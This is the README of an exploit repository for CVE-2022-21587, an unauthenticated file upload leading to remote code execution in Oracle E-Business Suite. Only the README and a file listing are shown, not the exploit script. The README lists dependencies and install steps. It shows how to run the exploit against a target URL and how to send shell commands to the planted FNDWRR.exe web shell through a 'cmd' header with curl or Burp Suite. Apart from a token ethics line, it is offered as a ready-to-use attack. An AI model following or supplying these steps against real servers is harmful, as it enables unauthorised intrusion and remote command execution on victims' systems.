CVE-2022-21587 PoC — Oracle E-Business Suite 访问控制错误漏洞

Source

Associated Vulnerability

Description

This script is used for automating exploit for Oracle Ebussiness (EBS) for CVE 2022-21587 ( Unauthenticated File Upload For Remote Code Execution)

Readme

Prerequirement for this exploit to run:

- python3 including module (requests, os, sys, slipit)
- uuencode



Before you run, make sure to use for only on ethical duties


if the exploit Fail to run:
- Make sure you already install the pre req module

install requests
- pip3 install requests


- Install slipit, git clone https://github.com/usdAG/slipit
  - cd slipit
  - python3 setup.py sdist
  - pip3 install --user dist/* OR python3 -m pip install --user dist/*
  
- Install uuencode
  - sudo apt install sharutils
  
 

- Usage : python3 exploit.py http://target.com
  - then the shell will poping up OR you can also execute the shell using curl or web proxies tools(burpsuite)
  - using curl : curl -k https://target/OA_CGI/FNDWRR.exe -H 'cmd: whoami'
  - using burpsuite: Just adding `cmd` in header request with any bash payload you want execute

File Snapshot

 [4.0K]  /data/pocs/74afd4e209a50f9aa357d2b7bff7ff6c9bb5f5c2
├── [1.7K]  exploit.py
└── [ 855]  README.md

0 directories, 2 files

Remarks